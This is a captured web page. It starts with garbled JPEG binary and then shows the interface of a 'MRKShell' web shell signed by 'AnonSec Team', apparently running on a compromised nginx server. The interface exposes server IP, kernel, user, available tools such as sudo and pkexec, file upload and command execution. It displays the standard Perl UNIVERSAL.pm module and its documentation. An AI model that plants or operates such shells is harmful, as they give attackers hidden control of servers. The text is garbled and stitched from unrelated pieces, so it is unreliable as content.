JFIF # -$)%7&).0444#9?92>-240 5+#+4;224;652252222225222220222522225222522;2225222222"B!1AQa"q2B#R3br5CS/!12AQ"aRq#3 ??;}q7:bd%Ո>L8/$rsrQٷf=+e: Rb0Z6pN۰7b 1S`JAT K,-֥7(bNRb9CsD/s,9?}+KA]`,EΞ@@ 3ukq14""tD@D@D@D@D@D@D@D@D@D@D@ȓ|:^Yw-)G%AI/9pwVSнm@6=g7AA5tg18gj>F'J,{C3(q<*#AzX?[$va:Q4SԽ7Uԥ&,c}nF;3mO$DN}RySm\*I"}b%7GLj;gp{{FYs(p_xOJFtStǸMU蓰s95"#H'Uq>7F5[}>v%'Y,&CqMzn}m*Xo vl˳hrӦ V)))g`7$sz^%I-1leE]y%݉>?f}( *BNNñ𜤢S[i'T1 ӥԊ>NlHď~)pKw1.UsD LI/k]Sr\r=ߴMAZNKi+P}| qBS*G*z:Imk\_|l6A7߉H\z0賈'Zt_\u>4 {\#O[ERxzLvP wOLT C0ȴ]BAʷ7uNNINS,(DDDDDDDL8MY݂N$ dMK׭i2FesmNQ=?omKv]OVl^@&pɴ[t5+E`oy.E]Ϳ}$g(7y7&X+imcT\(cHɤ|=. C =yȗXʧpv=&cX*[X_i4 GtfFՓnbMjR@ thv4LO I0zlU-_*G!cH9`nԿ \k-~rS*c[}9]qbi~+%)(h($ s;dՒG_\ё[Q,plq!pEſA RZU0*\n]a~Md_3EZ { &8e:jR*dAkyۛs\B˞0Z5%6e`3;0slSx+Xȇ"*ozkE"vܬWاQ8r @ m5$ [/KNFycgrۑ@ {""""""|xd*@s7o~7BSG|܎vøGtЍL١ѬnK/, f~^~l/Ij+!JI'^;{˚*hӤJarʮ)ڱ[P^$;%.V FLJW̔?2ԭUpJe,~b%iW Yhz̻FAl|3ln"M4kM@$2wmͣp8JY)ݬ.]3vԩİ(P*Tb/1FXTg KŮ*C9jE[69d!GZȩMu!5`H\Cp"=wSAmJjCn&/*Q[kQ~b"zΕ~)aA(2EZ0(FÑp.66_φk}T5 YdRarK ɽLSj"SnR-N-Mz~F^Igb Jq(~X fH'Ӵp5_HN(ܰ,Ȍ䶛DK%a~?FuI}"p=U+j}'p&I_ɑ-x!IٮM:w|q;9M?.6x:ODѪ̬zTL`t^?8xJ$ Q cL4d/_xy ˔ SPGNgwSrrS/`5ӧKj ,hTpI=LѦ(,Pc4*4iESO?5sMz<`&_bsTO)fkX[ xqq::h9ifVۉ\_R }JVg~Jzm`(]:O &6IOghX6+HM 7X]RkUr{HL-"< >~28b{[><@6gF5&\1̹nVŕonZM7 (SF$l\sM];owE+IֹȫzɲDߌPcMQMG)b,N ;*!uo&rHT`s^7įĴz0?P&Ҫ3]@H:hڢFҢM~p{&0s?k}+Ι9׵mw >?"fs+Odٯ̌m(R9T:UpbkW=F*ZQh urk8C8@ҧeUԀyKS '.UP,NBcpFS6n=AJl*7 4<(XY_Cda/D=()b,{yHL>[jrǹ7#M7fO`o/w]GȈEU2f\?7a)#봙݂͠SEg>VRdPfF@PV"Ꮷ_(qCJG_0?1[% NKu$7&ۭ ߡ26U$`/ 3ES:/nek |\tmSg5 س}6/qDT "(*sP4SrX)%T(6y%_ Z9<%]B}oyyY"]76*U*vjijw i3D̍IS \Jnn9ۋ>%o;~)5u56槡'z* B5#5

5#a`,>1TW{Xɘ}G4"ҕ4z5F>e6*[\;%*U0LUUr2cpnݢkɜY͌3+bG0#el۴oe,,jO*M1X/3z)W^,p>s{ İQs:ޝd|w :fIe$~+ajXjnT80'S>KIUP&kNϒT=XlȞNڞ]Yz_K[Qׂގ\gq!nB@IoG *l;_뼳\RUeэkm)qh傢5KNz٘6ba:671k{  $N vfN]S7gxg=VjG;wBx t~l/"ʭl=ԝ6n[Dٛ]@"x)# E):\8Bvkcpv4O*;coJ?4ªMCA'.\zVð'w1USݻSlTyj/ gʕ,:S')ܴ]7!A^b%P׶ٮհU3 o\}XTp,e 597n}dk6UFrVǧ3qaR:BWn>Ѻ}oxKӦK)kܑKL tCs1#?升 v{r:u)?#ZxM=ڝYـ#e}JHBGTG>GsܞG2+~R̅Hש)$[*Hfx-ugx({ I7λwvYm~ |e'X#db@hW,0H8*J5AъA`;jȊY*&sh8Jn]"M>l3z%Րsy=Um'qF sX %,Uv|0W`Gzcy*V0'3R`5ޓ Hڙ>PWbw7;)[U(:krm>/ QU+)P>Hm!r -evY>wT7ԝe)^6_SN⚓ϫ('?2Sj5,[پd|+_Pv'[]t'mΝ2l}z/dz^E|"'J qED)R2ƂSg`9Ոu5~ d!G%>M6%pdcP-P L`ϼTQnA_,24G GneRn,XnߕSzV$ReBfZuE ,Z(yi?vO!clOYA [; c I|vCom+Hꡤ\eaӴ;XS|v4%FcϷAQ[yϢ_s+Ơ&pt}=%^Sb"#gĀ'[ oAUPzr;ȔZTy4t>f種ً>T؟GRgC^-WЖukS,G LV$ܱO餰%cp)[*X_v$@DDӢ3bE-V0֍?zySyadd\ j5": Bxi?;3a]1]ZFD澙rc|8uz/ CȎ3UTqb4'ҥX 6KʖYT2fPe$6 lGzSQTP} OL1q^*rxջQ_K?'?=V MR K IS HERE

MRKShell
Server IP : 172.67.193.120  /  Your IP : 172.71.28.168
Web Server : nginx/1.14.1
System : Linux comtuc2-s-2vcpu-8gb-160gb-intel-nyc3 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User : nginx ( 991)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/perl5/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/perl5/UNIVERSAL.pm
package UNIVERSAL;

our $VERSION = '1.13';

# UNIVERSAL should not contain any extra subs/methods beyond those
# that it exists to define. The existence of import() below is a historical
# accident that can't be fixed without breaking code.

# Make sure that even though the import method is called, it doesn't do
# anything unless called on UNIVERSAL.
sub import {
    return unless $_[0] eq __PACKAGE__;
    return unless @_ > 1;
    require Carp;
    Carp::croak("UNIVERSAL does not export anything");
}

1;
__END__

=head1 NAME

UNIVERSAL - base class for ALL classes (blessed references)

=head1 SYNOPSIS

    $is_io    = $fd->isa("IO::Handle");
    $is_io    = Class->isa("IO::Handle");

    $does_log = $obj->DOES("Logger");
    $does_log = Class->DOES("Logger");

    $sub      = $obj->can("print");
    $sub      = Class->can("print");

    $sub      = eval { $ref->can("fandango") };
    $ver      = $obj->VERSION;

    # but never do this!
    $is_io    = UNIVERSAL::isa($fd, "IO::Handle");
    $sub      = UNIVERSAL::can($obj, "print");

=head1 DESCRIPTION

C<UNIVERSAL> is the base class from which all blessed references inherit.
See L<perlobj>.

C<UNIVERSAL> provides the following methods:

=over 4

=item C<< $obj->isa( TYPE ) >>

=item C<< CLASS->isa( TYPE ) >>

=item C<< eval { VAL->isa( TYPE ) } >>

Where

=over 4

=item C<TYPE>

is a package name

=item C<$obj>

is a blessed reference or a package name

=item C<CLASS>

is a package name

=item C<VAL>

is any of the above or an unblessed reference

=back

When used as an instance or class method (C<< $obj->isa( TYPE ) >>),
C<isa> returns I<true> if $obj is blessed into package C<TYPE> or
inherits from package C<TYPE>.

When used as a class method (C<< CLASS->isa( TYPE ) >>, sometimes
referred to as a static method), C<isa> returns I<true> if C<CLASS>
inherits from (or is itself) the name of the package C<TYPE> or
inherits from package C<TYPE>.

If you're not sure what you have (the C<VAL> case), wrap the method call in an
C<eval> block to catch the exception if C<VAL> is undefined.

If you want to be sure that you're calling C<isa> as a method, not a class,
check the invocand with C<blessed> from L<Scalar::Util> first:

  use Scalar::Util 'blessed';

  if ( blessed( $obj ) && $obj->isa("Some::Class") ) {
      ...
  }

=item C<< $obj->DOES( ROLE ) >>

=item C<< CLASS->DOES( ROLE ) >>

C<DOES> checks if the object or class performs the role C<ROLE>.  A role is a
named group of specific behavior (often methods of particular names and
signatures), similar to a class, but not necessarily a complete class by
itself.  For example, logging or serialization may be roles.

C<DOES> and C<isa> are similar, in that if either is true, you know that the
object or class on which you call the method can perform specific behavior.
However, C<DOES> is different from C<isa> in that it does not care I<how> the
invocand performs the operations, merely that it does.  (C<isa> of course
mandates an inheritance relationship.  Other relationships include aggregation,
delegation, and mocking.)

By default, classes in Perl only perform the C<UNIVERSAL> role, as well as the
role of all classes in their inheritance.  In other words, by default C<DOES>
responds identically to C<isa>.

There is a relationship between roles and classes, as each class implies the
existence of a role of the same name.  There is also a relationship between
inheritance and roles, in that a subclass that inherits from an ancestor class
implicitly performs any roles its parent performs.  Thus you can use C<DOES> in
place of C<isa> safely, as it will return true in all places where C<isa> will
return true (provided that any overridden C<DOES> I<and> C<isa> methods behave
appropriately).

=item C<< $obj->can( METHOD ) >>

=item C<< CLASS->can( METHOD ) >>

=item C<< eval { VAL->can( METHOD ) } >>

C<can> checks if the object or class has a method called C<METHOD>. If it does,
then it returns a reference to the sub.  If it does not, then it returns
I<undef>.  This includes methods inherited or imported by C<$obj>, C<CLASS>, or
C<VAL>.

C<can> cannot know whether an object will be able to provide a method through
AUTOLOAD (unless the object's class has overridden C<can> appropriately), so a
return value of I<undef> does not necessarily mean the object will not be able
to handle the method call. To get around this some module authors use a forward
declaration (see L<perlsub>) for methods they will handle via AUTOLOAD. For
such 'dummy' subs, C<can> will still return a code reference, which, when
called, will fall through to the AUTOLOAD. If no suitable AUTOLOAD is provided,
calling the coderef will cause an error.

You may call C<can> as a class (static) method or an object method.

Again, the same rule about having a valid invocand applies -- use an C<eval>
block or C<blessed> if you need to be extra paranoid.

=item C<VERSION ( [ REQUIRE ] )>

C<VERSION> will return the value of the variable C<$VERSION> in the
package the object is blessed into. If C<REQUIRE> is given then
it will do a comparison and die if the package version is not
greater than or equal to C<REQUIRE>, or if either C<$VERSION> or C<REQUIRE>
is not a "lax" version number (as defined by the L<version> module).

The return from C<VERSION> will actually be the stringified version object
using the package C<$VERSION> scalar, which is guaranteed to be equivalent
but may not be precisely the contents of the C<$VERSION> scalar.  If you want
the actual contents of C<$VERSION>, use C<$CLASS::VERSION> instead.

C<VERSION> can be called as either a class (static) method or an object
method.

=back

=head1 WARNINGS

B<NOTE:> C<can> directly uses Perl's internal code for method lookup, and
C<isa> uses a very similar method and cache-ing strategy. This may cause
strange effects if the Perl code dynamically changes @ISA in any package.

You may add other methods to the UNIVERSAL class via Perl or XS code.
You do not need to C<use UNIVERSAL> to make these methods
available to your program (and you should not do so).

=head1 EXPORTS

None.

Previous versions of this documentation suggested using C<isa> as
a function to determine the type of a reference:

  $yes = UNIVERSAL::isa($h, "HASH");
  $yes = UNIVERSAL::isa("Foo", "Bar");

The problem is that this code would I<never> call an overridden C<isa> method in
any class.  Instead, use C<reftype> from L<Scalar::Util> for the first case:

  use Scalar::Util 'reftype';

  $yes = reftype( $h ) eq "HASH";

and the method form of C<isa> for the second:

  $yes = Foo->isa("Bar");

=cut

Anon7 - 2022
AnonSec Team